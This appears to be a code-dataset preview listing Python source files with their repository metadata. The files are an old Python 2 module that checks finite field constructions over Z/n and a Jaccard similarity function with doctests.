fullname = self.fullname
elif fullname != self.fullname:
raise ImportError("Loader for module %s cannot handle "
"module %s" % (self.fullname
|
xbmc/atv2
|
xbmc/lib/libPython/Python/Lib/lib-old/zmod.py
|
Python
|
gpl-2.0
| 2,363
| 0.007194
|
# module 'zmod'
# Compute properties of mathematical "fields" formed by taking
# Z/n (the whole numbers modulo some whole number n) and an
# irreducible polynomial (i.e., a polynomial with only complex zeros),
# e.g., Z/5 and X**2 + 2.
#
# The field is formed by taking all possible linear combinations of
# a set of d base vectors (where d is the degree of the polynomial).
#
# Note that this procedure doesn't yield a field for all combinations
# of n and p: it may well be that some numbers have more than one
# inverse and others have none. This is what we check.
#
# Remember that a field is a ring where each element has an inverse.
# A ring has commutative addition and multiplication, a zero and a one:
# 0*x = x*0 = 0, 0+x = x+0 = x, 1*x = x*1 = x. Also, the distributive
# property holds: a*(b+c) = a*b + b*c.
# (XXX I forget if this is an axiom or follows from the rules.)
import poly
# Example N and polynomial
N = 5
P = poly.plus(poly.one(0, 2), poly.one(2, 1)) # 2 + x**2
# Return x modulo y. Returns >= 0 even if x < 0.
def mod(x, y):
    """Return x modulo y; like Python's %, the result takes the sign of y,
    so it is >= 0 for positive y even when x < 0."""
    _, remainder = divmod(x, y)
    return remainder
# Normalize a polynomial modulo n and modulo p.
def norm(a, n, p):
    """Normalize polynomial a: reduce modulo the polynomial p, then take each
    coefficient modulo n, and strip leading zero coefficients."""
    reduced = poly.modulo(a, p)
    # Fresh list: reduce every coefficient into Z/n without mutating input.
    coeffs = [mod(coefficient, n) for coefficient in reduced]
    return poly.normalize(coeffs)
# Make a list of all n^d elements of the proposed field.
def make_all(mat):
    """Flatten a matrix (sequence of rows) into a single list of its entries,
    preserving row-major order."""
    return [entry for row in mat for entry in row]
def make_elements(n, d):
    """Build all n**d polynomials of degree < d with coefficients in Z/n.

    Recursive construction: extend each degree-(d-1) element with every
    possible coefficient for the x**(d-1) term.
    """
    if d == 0:
        return [poly.one(0, 0)]
    elements = []
    for stem in make_elements(n, d - 1):
        for coefficient in range(n):
            elements.append(poly.plus(stem, poly.one(d - 1, coefficient)))
    return elements
def make_inv(all, n, p):
    """Map each element a of `all` to norm(a * x, n, p), i.e. the image of the
    field under multiplication by the polynomial x."""
    x = poly.one(1, 1)
    return [norm(poly.times(element, x), n, p) for element in all]
def checkfield(n, p):
    # Build every element of the proposed field Z/n adjoin a root of p, map
    # each through multiplication by x, and compare the sorted element list
    # with its sorted image.  Per the module header this detects structures
    # where inverses are missing or duplicated (i.e. not a field).
    # NOTE(review): Python 2 print statements -- this module predates Py3.
    all = make_elements(n, len(p)-1)
    inv = make_inv(all, n, p)
    all1 = all[:]
    inv1 = inv[:]
    all1.sort()
    inv1.sort()
    if all1 == inv1: print 'BINGO!'
    else:
        print 'Sorry:', n, p
        print all
        print inv
def rj(s, width):
    """Right-justify: return s left-padded with spaces to `width`.

    Non-string arguments are converted with repr() first (the original used
    Python 2 backtick-repr, which is a syntax error on Python 3; repr() is
    equivalent on both).  Strings already at least `width` long are returned
    unchanged.
    """
    if type(s) is not type(''):
        s = repr(s)
    n = len(s)
    if n >= width:
        return s
    return ' ' * (width - n) + s
def lj(s, width):
    """Left-justify: return s right-padded with spaces to `width`.

    Non-string arguments are converted with repr() first (the original used
    Python 2 backtick-repr, which is a syntax error on Python 3; repr() is
    equivalent on both).  Strings already at least `width` long are returned
    unchanged.
    """
    if type(s) is not type(''):
        s = repr(s)
    n = len(s)
    if n >= width:
        return s
    return s + ' ' * (width - n)
|
TheAlgorithms/Python
|
maths/jaccard_similarity.py
|
Python
|
mit
| 2,365
| 0
|
"""
The Jaccard similarity coefficient is a commonly used indicator of the
similarity between two sets. Let U be a set and A and B be subsets of U,
then the Jaccard index/similarity is defined to be the ratio of the number
of elements of their intersection and the number of elements of their union.
Inspired from Wikipedia and
the book Mining of Massive Datasets [MMDS 2nd Edition, Chapter 3]
https://en.wikipedia.org/wiki/Jaccard_index
https://mmds.org
Jaccard similarity is widely used with MinHashing.
"""
def jaccard_similariy(setA, setB, alternativeUnion=False):
    """
    Finds the jaccard similarity between two sets.
    Essentially, its intersection over union.

    The alternative way to calculate this is to take union as sum of the
    number of items in the two sets. This will lead to jaccard similarity
    of a set with itself be 1/2 instead of 1. [MMDS 2nd Edition, Page 77]

    Parameters:
        :setA (set,list,tuple): A non-empty set/list
        :setB (set,list,tuple): A non-empty set/list
        :alternativeUnion (boolean): If True, use sum of number of
        items as union

    Output:
        (float) The jaccard similarity between the two sets.

    Examples:
    >>> setA = {'a', 'b', 'c', 'd', 'e'}
    >>> setB = {'c', 'd', 'e', 'f', 'h', 'i'}
    >>> jaccard_similariy(setA, setB)
    0.375

    >>> jaccard_similariy(setA, setA)
    1.0

    >>> jaccard_similariy(setA, setA, True)
    0.5

    >>> setA = ('a', 'b', 'c', 'd', 'e')
    >>> setB = ('c', 'd', 'e', 'f', 'h', 'i')
    >>> jaccard_similariy(setA, setB)
    0.375
    """
    if isinstance(setA, set) and isinstance(setB, set):
        intersection = len(setA.intersection(setB))
        if alternativeUnion:
            union = len(setA) + len(setB)
        else:
            union = len(setA.union(setB))
        return intersection / union

    if isinstance(setA, (list, tuple)) and isinstance(setB, (list, tuple)):
        # Sequence path keeps duplicates, matching the original semantics.
        intersection = [element for element in setA if element in setB]
        if alternativeUnion:
            union = len(setA) + len(setB)
        else:
            # list(setA): the original wrote `setA + [...]`, which raises
            # TypeError for tuple inputs despite the documented tuple support.
            union = list(setA) + [element for element in setB if element not in setA]
        return len(intersection) / len(union)

    # Mixed container kinds (e.g. set vs list) previously fell through and
    # silently returned None; normalise both sides to sets instead.
    return jaccard_similariy(set(setA), set(setB), alternativeUnion)
if __name__ == "__main__":
    # Quick demo mirroring the docstring example; expected output: 0.375.
    setA = {"a", "b", "c", "d", "e"}
    setB = {"c", "d", "e", "f", "h", "i"}
    print(jaccard_similariy(setA, setB))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.